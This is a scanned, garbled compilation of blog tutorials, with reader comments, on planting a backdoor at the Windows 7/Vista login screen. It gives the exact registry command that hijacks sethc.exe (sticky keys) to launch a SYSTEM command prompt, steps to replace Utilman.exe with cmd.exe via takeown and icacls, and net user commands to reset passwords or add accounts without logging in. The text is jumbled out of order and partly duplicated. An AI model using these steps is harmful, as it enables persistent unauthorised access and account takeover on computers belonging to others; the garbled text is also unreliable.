You are on page 1of 16

Backdoor to Reset Administrator

Password or Add New User in Windows 7
As long as there is physical access to a computer, it is always possible to gain access to the
operating system even if it is password protected. For example, you can use Kon-Boot to
login to any user account in Windows with any password by booting up the computer with
the CD or USB. If BIOS is secured with a password to prevent changing of boot order, you
can change the jumpers or remove the battery from the motherboard to clear the CMOS
settings. As long as you can boot up the computer with CD or USB, there are quite a lot of
tools that allows you to reset the user account password even if you don’t know the original
password.
Here is an interesting method which I recently discovered that allows you to plant a
backdoor to your Windows 7 operating system so that you can always reset or even add a
new user account without even first logging in to Windows. This method is a bit restrictive
because it requires an administrator privilege to the computer in order to make changes to
the system but it does not involve installing any third party software or changing any
system files like the old DreamPackPL.
This backdoor allows you to run command prompt (cmd.exe) with system privilege from
the Windows 7 login screen. So with a system privilege command prompt in your hands,
you can actually do a lot of stuff including creating new accounts to resetting administrator
password to gain access to the password protected Windows. Check out these step-by-step
instructions:
1. First, make sure you are logged in as an administrator. Click on the start button, type
cmd in the Search programs and files bar, right click on the cmd.exe that is displayed on the
list and select “Run as administrator”.
2. Copy the command below and paste it to the command prompt.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
If you see the message that says “The operation completed successfully”, that means you
have installed the backdoor. If not, make sure you are logged in to a user account with
administrator privilege and also run the cmd as administrator.

You can now do whatever you want with it such as typing: Explorer – To launch explorer and give you access to Start menu and taskbar. Any attempt to run Windows Explorer will prompt an error saying “The server process could not be started because the configured identity is incorrect. you can either press the SHIFT key continuously for 5 times or Alt+Shift+PrintScreen which will open a command prompt with system privilege.3. When you are at the login screen. use the dir command instead in cmd. If you need to check the files and folders on the sytem. . Check the username and password”.

In the Windows login screen. simply delete the registry value that you have added or paste the command below to an elevated command prompt followed by pressing the Y key to confirm the deletion.exe file. Adding the provided registry will tell Windows that you want to run cmd. Net user user_name password /add – This command allows you to add a new user to the system so you can login to Windows without touching the existing user accounts. This proof of concept has been around for a very long time and is not really an exploit which is why Microsoft does not intend to patch and block it. . Attempting to turn on either one with launch the sethc. REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" Here is a simple explanation on how this backdoor works.exe as a debugger for sethc.exe but the problem is Windows does not check if it is a valid debugger. you are allowed to turn on sticky keys or high contrast using the hotkeys (Shift x 5 OR Alt+Shift+PrintScreen). To remove or uninstall the backdoor.Net user user_name new_password – This command allows you to set a new password to any username without knowing the current password. you will run the command prompt instead. So whenever you try to launch sticky keys or high contrast in the Windows 7 login screen.

This is fun. Can we create a vista backdoor.exe is the key located at System Folder. something like that in Windows Vista or 7? Yes you Can! How? The Clue: The Ease of Access Program Where? The 624kb Utilman.exe .Below is a video demo to show how the whole thing works. Anyone of you watch the famous 1995 movie "The Net" by Sandra Bullock? The Famous Praetorian PI was used as a backdoor to access password-protected sites. Unlock! Create a hidden or invisible drive Tip! How to execute an app during Windows startup Updated! Adding Desktop Right-Click Menu items using Registry and Regdevelop Unlock For Us Hidden Backdoor in Windows 7/Vista Welcome Screen Ok. Steps: Open the Folder Windows\System32\ and check the Properties of Utilman.

you can't. (The Next Version can do it easily).. it will give you the message: Destination Folder Access is Denied You need permission to perform this action Normally. Winbubble Context Menu "Take the Ownership of this file" can add the permission but this time. Most of the Buttons are Disabled. Also..Problem. How to Add the permission . My current Logon Username Lawrence and Administrators has no Permission no modify the file. If you try to rename the file. Thus.

you'll get this message: ERROR: The current logged on user does not have ownership privileges on the file (or folder) "c:\windows\system32\Utilman. Rename Utilman.g.g.Prevention is better than Cure: To easily recover your system from any problems.Control_RunDLL sysdm.cpl.exe . Create a Restore Point First using the Context Menu that can be created by WinBubbles.exe" 2. Take the Ownership Of the File using the LONG METHOD.4 > Create Button > Enter the name 1.. icacls "c:\windows\system32\Utilman. takeown /f "c:\windows\system32\Utilman.exe to any for backup example: Utilman_old. Read here or you can do it manually: Win+R > rundll32.dll. Start Search > type CMD > Press CTRL+ALT+Enter > Enter the Following commands: a.exe shell32.exe" b. takeown /f "Directory\File" e. Click here and Right-Click the file > Properties > Go to Security Tab > To change Permission Click Edit Button > Click Administrator > Click to Check Allow Setting of Full Control option box Another Way because I understand that your a Geek: Open Command Prompt as Administrator.exe as administrator. icacls "Directory\File" /grant administrators:F e.exe" /grant administrators:F If you didn't open CMD.

Create a copy of cmd. Rename the Copy .exe (CTRL+Drag) 4.. Click the Right Arrow > Switch User 5.exe".. Don't rename it to "Utilman. Click the Blue Magic Button pointed by the arrow as shown in the first Picture above.3. You have now successfully launch a Command Prompt in Administrator mode with UAC disabled. . Doesn't Work? Possible Mistake: In your Folder Option Window > View Tab > "If Hide extensions for known file types" is checked. use "Utilman" ONLY.cmd to Utilman That's It! Go to your Welcome Screen: Start Menu > At the Bottom.

Net user [Username] [NewPassword] For more Information. That's the time it will became Illegal. SWEET!!! Start Hacking your own computer :) Now. it is.. this is bad if you'll use it that way. My steps needs the Administrator login to create a backdoor and If you do this by using another OS like Linux to another computer. Create a Backdoor instead! Is this bad? Of course. Type: whoami /all |more . Works great in Windows 7 32/64 bit version! NOTE: You need to re-open again the program after restarting your computer and repeat the procedure again to be able to activate the feature. Logon Tools option Click Yes and Restart your PC.. Read Here Is this legal? Yes. you can easily get this functionality in just few clicks! Click the Windows 7/Utilities Tab. it's fine for me to forget my password without creating a password reset disk or by hacking and clearing Vista Password using a Linux OS.NEW! Using the newest version of WinBubble.

. why not just forget your password for your username all together and boot directly to the desktop :) November 20.exe (Browse Button let's you run a mini-windows explorer). Windows Mail and many more Note: There is a possibility that the guide above will work in latest build (RC version) of Windows 7..) November 22. Wait. 2008 at 11:23 PM Nura M. Windows Calendar. Tell me? ENJOY LEARNING WINDOWS!!! 6 Comments: vince said. I am curious. but won't that just defeat the purpose of the welcome screen?.. 2008 at 11:32 PM Anonymous said.. Hi! I have forgotten that movie(The Net) you were talking about.exe! In my observations:       Windows Firewall is ON (Great!) Spyware and other Malware Protection is ON (Great!) User Account Control is OFF You can browse the Internet The Location of Desktop: c:\Windows\System32\config\systemprofile\Desktop Launch Windows Media Player...Now we can see that System logon is the one running when you input Username and Password in the Welcome Screen. nice hack. Try typing taskmgr.. Or can you not tell us that either? November 20.. said.. Notepad and even Explorer....... Due to License and some legal concerns I can't reveal any data. are you saying that you have Windows 7 Beta? Just wondering. I do not know if I may . It works! I have Windows 7 Build 6801 leaked from torrents and it worked perfectly! I am waiting to download "The Net (1995)". 2008 at 10:11 PM Anonymous said.

I WISH TO HAVE MORE OF YOUR EDUCATING INFORMATION. This is fun. something like that in Windows Vista or 7? Yes you Can! How? The Clue: The Ease of Access Program Where? The 624kb Utilman. Unlock! Create a hidden or invisible drive Tip! How to execute an app during Windows startup Updated! Adding Desktop Right-Click Menu items using Registry and Regdevelop Unlock For Us Hidden Backdoor in Windows 7/Vista Welcome Screen Ok.exe is the key located at System Folder. . Thanks! Nura November 23.be opportuned to have a look at it(refer me to site ). Can we create a vista backdoor... Anyone of you watch the famous 1995 movie "The Net" by Sandra Bullock? The Famous Praetorian PI was used as a backdoor to access password-protected sites. 2008 at 9:44 PM Anonymous said. so that I can answer the question.

Steps: Open the Folder Windows\System32\ and check the Properties of Utilman. My current Logon Username Lawrence and Administrators has no Permission no modify the file. it will give you the message: Destination Folder Access is Denied You need permission to perform this action Normally. (The Next Version can do it easily). you can't. Winbubble Context Menu "Take the Ownership of this file" can add the permission but this time. Also. Thus. If you try to rename the file. . Most of the Buttons are Disabled..exe Problem..

cpl.exe to any for backup example: Utilman_old.g.exe" b.exe as administrator.Control_RunDLL sysdm..4 > Create Button > Enter the name 1.g.exe shell32. Take the Ownership Of the File using the LONG METHOD. Start Search > type CMD > Press CTRL+ALT+Enter > Enter the Following commands: a. Click here and Right-Click the file > Properties > Go to Security Tab > To change Permission Click Edit Button > Click Administrator > Click to Check Allow Setting of Full Control option box Another Way because I understand that your a Geek: Open Command Prompt as Administrator. you'll get this message: ERROR: The current logged on user does not have ownership privileges on the file (or folder) "c:\windows\system32\Utilman.exe" 2. icacls "Directory\File" /grant administrators:F e.dll. Create a Restore Point First using the Context Menu that can be created by WinBubbles.exe" /grant administrators:F If you didn't open CMD. Rename Utilman. takeown /f "Directory\File" e. icacls "c:\windows\system32\Utilman. takeown /f "c:\windows\system32\Utilman.exe . Read here or you can do it manually: Win+R > rundll32.How to Add the permission Prevention is better than Cure: To easily recover your system from any problems.

cmd to Utilman That's It! Go to your Welcome Screen: Start Menu > At the Bottom. Create a copy of cmd.exe (CTRL+Drag) 4. You have now successfully launch a Command Prompt in Administrator mode with UAC disabled. . Click the Right Arrow > Switch User 5.3.. Rename the Copy .. Click the Blue Magic Button pointed by the arrow as shown in the first Picture above.

. Works great in Windows 7 32/64 bit version! NOTE: You need to re-open again the program after restarting your computer and repeat the procedure again to be able to activate the feature. NEW! Using the newest version of WinBubble. this is bad if you'll use it that way. Logon Tools option Click Yes and Restart your PC.. Read Here Is this legal? Yes. it's fine for me to forget my password without creating a password reset disk or by hacking and clearing Vista Password using a Linux OS. Create a Backdoor instead! Is this bad? Of course. SWEET!!! Start Hacking your own computer :) Now. Don't rename it to "Utilman.exe". My steps needs the Administrator login to create a backdoor and If you do this by using another OS like Linux to another computer. use "Utilman" ONLY. Type: whoami /all |more . Net user [Username] [NewPassword] For more Information. That's the time it will became Illegal. it is. you can easily get this functionality in just few clicks! Click the Windows 7/Utilities Tab.Doesn't Work? Possible Mistake: In your Folder Option Window > View Tab > "If Hide extensions for known file types" is checked.

Try typing taskmgr. Wait.exe (Browse Button let's you run a mini-windows explorer). Windows Mail and many more Note: There is a possibility that the guide above will work in latest build (RC version) of Windows 7.. but won't that just defeat the purpose of the welcome screen?... Or can you not tell us that either? November 20. nice hack. are you saying that you have Windows 7 Beta? Just wondering..Now we can see that System logon is the one running when you input Username and Password in the Welcome Screen. 2008 at 11:32 PM Anonymous said... Notepad and even Explorer. Windows Calendar. Tell me? ENJOY LEARNING WINDOWS!!! 6 Comments: vince said. why not just forget your password for your username all together and boot directly to the desktop :) November 20. 2008 at 10:11 PM Anonymous said...exe! In my observations:       Windows Firewall is ON (Great!) Spyware and other Malware Protection is ON (Great!) User Account Control is OFF You can browse the Internet The Location of Desktop: c:\Windows\System32\config\systemprofile\Desktop Launch Windows Media Player. . Due to License and some legal concerns I can't reveal any data.

.. I am curious. 2008 at 11:23 PM Nura M..It works! I have Windows 7 Build 6801 leaked from torrents and it worked perfectly! I am waiting to download "The Net (1995)". said.) November 22.. 2008 at 9:44 PM Anonymous said... Thanks! Nura November 23. I do not know if I may be opportuned to have a look at it(refer me to site ).. .. . Hi! I have forgotten that movie(The Net) you were talking about. I WISH TO HAVE MORE OF YOUR EDUCATING INFORMATION. so that I can answer the question.